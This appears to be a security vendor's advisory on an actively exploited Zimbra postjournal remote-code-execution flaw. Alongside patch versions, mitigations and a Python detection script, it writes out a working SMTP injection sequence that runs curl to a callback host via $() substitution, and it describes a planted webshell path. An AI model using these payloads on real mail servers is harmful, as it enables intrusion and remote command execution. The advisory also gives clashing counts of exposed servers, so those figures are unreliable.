Zimbra Remote Code Execution Vulnerability Under Active Attack
2024-10-03 16:31:28 Author: cyble.com

Key Takeaways

  • A critical remote code execution (RCE) vulnerability (CVE-2024-45519) in Zimbra’s postjournal service is under active attack; users are urged to patch immediately.
  • A Proof of Concept (PoC) demonstrated that the vulnerability can be exploited with specially crafted emails.
  • The postjournal SMTP parsing service is not enabled by default in Zimbra, but as Cyble sensors detect more than 90,000 web-facing Zimbra instances with unpatched earlier vulnerabilities, all Zimbra customers should approach this issue with urgency.

Overview

A critical vulnerability (CVE-2024-45519) in Zimbra’s postjournal service that allows unauthenticated remote command execution is under active attack.

The vulnerability allows unsanitized user input to be passed to popen, enabling attackers to inject arbitrary commands.

Patched versions add input sanitization and replace popen with execvp to mitigate the direct command injection vulnerability. Zimbra administrators should also check the configuration of the mynetworks parameter to prevent external exploitation.

Patched versions include these versions and newer:

  • 8.8.15 Patch 46
  • 9.0.0 Patch 41
  • 10.0.9
  • 10.1.1

One IP that has been identified as a source of malicious emails and exploit attempts is 79.124.49[.]86.

Technical Analysis

Exploitation began after ProjectDiscovery researchers published a Proof of Concept (PoC) for the vulnerability.

The researchers reversed the unpatched postjournal binary and found no calls to execvp or to the run_command function; instead, the read_maps function called popen directly, so input reached the shell without sanitization. The cmd argument passed to popen wraps the address in double quotes, which neutralizes simple shell metacharacters such as ; and |, but $() command substitution is still expanded inside double quotes, so that control could be bypassed with $() syntax.
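To make the popen-versus-execvp distinction concrete, here is an added Python example; it is not code from the original post or from Zimbra's postjournal. It reproduces the two code paths with subprocess: shell=True hands the command string to /bin/sh -c exactly as popen(3) does, while an argv list is executed directly, as execvp does. The command being wrapped is stood in for by echo (an assumption; the page does not name the real command postjournal runs), the payload is a constructed address modelled on the PoC's RCPT TO value with the curl callback replaced by a harmless echo, and the allow-list sanitizer is an illustration of the kind of check needed, not the check Zimbra shipped.

```python
import re
import subprocess

# Stand-in for the command that postjournal builds around the recipient
# address. The real command line is not given on the page; "echo" is an
# assumption that keeps this example harmless and runnable.
BASE_CMD = "echo"


def run_vulnerable(recipient: str) -> str:
    """Unpatched code path: the address is interpolated into a command
    string inside double quotes and handed to /bin/sh (shell=True uses
    'sh -c', the same mechanism as popen(3)). Double quotes stop ';', '|'
    and '&' from being interpreted, but $(...) is still expanded."""
    cmd = f'{BASE_CMD} "{recipient}"'
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout.strip()


def run_fixed(recipient: str) -> str:
    """Patched code path: argv list, no shell (execvp semantics). Whatever
    the address contains reaches the program as one literal argument, so
    $(...), backticks and ${IFS} are never expanded."""
    out = subprocess.run([BASE_CMD, recipient], capture_output=True, text=True)
    return out.stdout.strip()


# Conservative allow-list for an address that will be placed on a command
# line. Assumption: plain addresses only, no quoted local parts, which is
# stricter than RFC 5321 but appropriate for input that touches a shell.
_SAFE_ADDRESS = re.compile(r"^[A-Za-z0-9._%+\-]+@[A-Za-z0-9.\-]+$")


def is_safe_recipient(recipient: str) -> bool:
    """Reject anything that is not a plain local-part@domain."""
    return _SAFE_ADDRESS.fullmatch(recipient) is not None


if __name__ == "__main__":
    # Constructed input modelled on the page's RCPT TO payload; a harmless
    # echo replaces the curl callback to oast.me.
    payload = "aabbb$(echo${IFS}INJECTED)@mail.domain.com"
    print("popen-style  :", run_vulnerable(payload))   # aabbbINJECTED@mail.domain.com
    print("execvp-style :", run_fixed(payload))        # address printed literally
    print("sanitizer    :", is_safe_recipient(payload)) # False
```

Run it on a Linux host with /bin/sh: the shell=True path prints the substituted text (the inner command ran), the argv path prints the address verbatim, and the sanitizer rejects it before it ever reaches either. The sanitizer matters even with execvp, because the downstream program may itself interpret its argument.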

The postjournal service was then exploited via port 10027 with the following SMTP commands:

EHLO localhost
MAIL FROM: <[email protected]>
RCPT TO: <"aabbb$(curl${IFS}oast.me)"@mail.domain.com>
DATA
Test message
.

The same exploit over SMTP port 25 required the postjournal service to be enabled, which was accomplished with a Bash script:

zmlocalconfig -e postjournal_enabled=true
zmcontrol restart

For remote exploitation, the researchers found that the default mynetworks configuration on their test instance included a /20 CIDR range containing their public IP address, so the exploit can be performed remotely whenever the postjournal service is enabled and the attacker's IP falls within the allowed range.

Proofpoint researchers have observed the vulnerability under exploitation: spoofed emails carry fake addresses in the CC field that are crafted so that a Zimbra server parses and executes them as commands. The local parts of these addresses contain base64 strings that are decoded and executed with the sh utility.

Some of the emails used the CC'd addresses in an attempt to build a webshell on a vulnerable Zimbra server. The full CC list is wrapped as one string, and when the base64 blobs are joined, they decode to a command that writes a webshell to /jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp (see image below).

[Image: Base64 Zimbra email exploit]

Once installed, the webshell listens for inbound connections and supports command execution via exec, or downloading and executing a file over a socket connection.
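As an added example (not code from the original post, nor Proofpoint's or Zimbra's tooling), the following Python script shows the detection side of the CC-address technique described above: it pulls every address out of a message's Cc header, flags local parts that contain shell substitution syntax, and joins and decodes the base64 fragments so an analyst can see what the command would have been. The sample message is constructed, and its fragments decode to a harmless echo rather than a webshell; the regexes are a hypothetical starting point, not a complete signature.

```python
import base64
import binascii
import re
from email import message_from_string

# Constructed sample message modelled on the CC-address technique described
# above. Each CC address carries one base64 fragment inside a $(...)
# substitution; the fragments, joined in order, decode to a harmless
# "echo demo > /tmp/x" rather than a webshell. Nothing here is executed.
SAMPLE_EMAIL = (
    "From: sender@example.invalid\n"
    "To: victim@mail.domain.com\n"
    "Cc: \"aabbb'$(echo${IFS}ZWNobyBkZW1v|base64${IFS}-d|sh)'\"@mail.domain.com,\n"
    " \"aabbb'$(echo${IFS}ID4gL3RtcC94|base64${IFS}-d|sh)'\"@mail.domain.com\n"
    "Subject: test\n"
    "\n"
    "Test message\n"
)

# A quoted local part ("...") or a bare one, followed by @domain.
_ADDRESS = re.compile(r'"[^"]*"@[A-Za-z0-9.\-]+|[^\s,<>"]+@[A-Za-z0-9.\-]+')
# Shell constructs that have no business in a recipient address (hypothetical
# markers chosen from the payloads discussed on this page).
_SHELL_MARKERS = re.compile(r"\$\(|`|\$\{IFS\}|\|\s*sh\b|base64")
# Runs of base64 alphabet long enough not to match ordinary address tokens.
_B64_RUN = re.compile(r"[A-Za-z0-9+/]{8,}={0,2}")


def extract_cc_addresses(raw_message: str) -> list:
    """Return every address-looking token from all Cc headers."""
    msg = message_from_string(raw_message)
    found = []
    for header in msg.get_all("Cc", []):
        found.extend(_ADDRESS.findall(header))
    return found


def is_suspicious_address(address: str) -> bool:
    """True if the local part carries shell substitution syntax."""
    local_part = address.rsplit("@", 1)[0]
    return _SHELL_MARKERS.search(local_part) is not None


def recover_payload(addresses: list):
    """Join the base64 fragments found in suspicious addresses and decode
    them. Returns the decoded text, or None if nothing decodes cleanly."""
    fragments = []
    for addr in addresses:
        if is_suspicious_address(addr):
            fragments.extend(_B64_RUN.findall(addr.rsplit("@", 1)[0]))
    if not fragments:
        return None
    try:
        decoded = base64.b64decode("".join(fragments), validate=True)
    except binascii.Error:
        return None
    return decoded.decode("utf-8", errors="replace")


def analyze(raw_message: str) -> dict:
    """Summarize one message: CC count, suspicious addresses, decoded payload."""
    addresses = extract_cc_addresses(raw_message)
    suspicious = [a for a in addresses if is_suspicious_address(a)]
    return {
        "cc_count": len(addresses),
        "suspicious": suspicious,
        "payload": recover_payload(addresses),
    }


if __name__ == "__main__":
    result = analyze(SAMPLE_EMAIL)
    print(f"{result['cc_count']} CC addresses, {len(result['suspicious'])} suspicious")
    print("decoded payload:", result["payload"])
```

A mail gateway or SIEM pipeline could run analyze() over messages addressed to a Zimbra host and alert whenever payload is not None. The joined-fragment decode is the useful part: each address on its own looks like noise, and only the concatenation reveals the command the attacker wanted sh to run.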

Zimbra is a popular target of cyber threat actors, and CISA already includes several critical vulnerabilities in the Zimbra Product Suite in its Known Exploited Vulnerabilities catalog:

CVE ID         | Vendor | Product                   | Vulnerability name
---------------|--------|---------------------------|---------------------------------------------------------------------------
CVE-2023-37580 | Zimbra | Collaboration (ZCS)       | Zimbra Collaboration (ZCS) Cross-Site Scripting (XSS) Vulnerability
CVE-2022-27926 | Zimbra | Collaboration (ZCS)       | Zimbra Collaboration (ZCS) Cross-Site Scripting (XSS) Vulnerability
CVE-2022-41352 | Zimbra | Collaboration (ZCS)       | Zimbra Collaboration (ZCS) Arbitrary File Upload Vulnerability
CVE-2022-27925 | Zimbra | Collaboration (ZCS)       | Zimbra Collaboration (ZCS) Arbitrary File Upload Vulnerability
CVE-2022-37042 | Zimbra | Collaboration (ZCS)       | Zimbra Collaboration (ZCS) Authentication Bypass Vulnerability
CVE-2022-27924 | Zimbra | Collaboration (ZCS)       | Zimbra Collaboration (ZCS) Command Injection Vulnerability
CVE-2018-6882  | Zimbra | Collaboration Suite (ZCS) | Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability
CVE-2022-24682 | Zimbra | Webmail                   | Zimbra Webmail Cross-Site Scripting Vulnerability

While CVE-2024-45519 has not yet been added to that catalog, Cyble data already shows more than 50,000 web-exposed Zimbra servers with unpatched earlier critical vulnerabilities. It remains to be seen how many will be exposed to the latest vulnerability.

Recommendations

All Zimbra administrators should:

  • Disable postjournal if it is not needed
  • Restrict mynetworks to trusted hosts so that untrusted senders cannot reach the service
  • Apply the latest security updates directly from Zimbra


Article source: https://cyble.com/blog/zimbra-remote-code-execution-vulnerability-under-active-attack/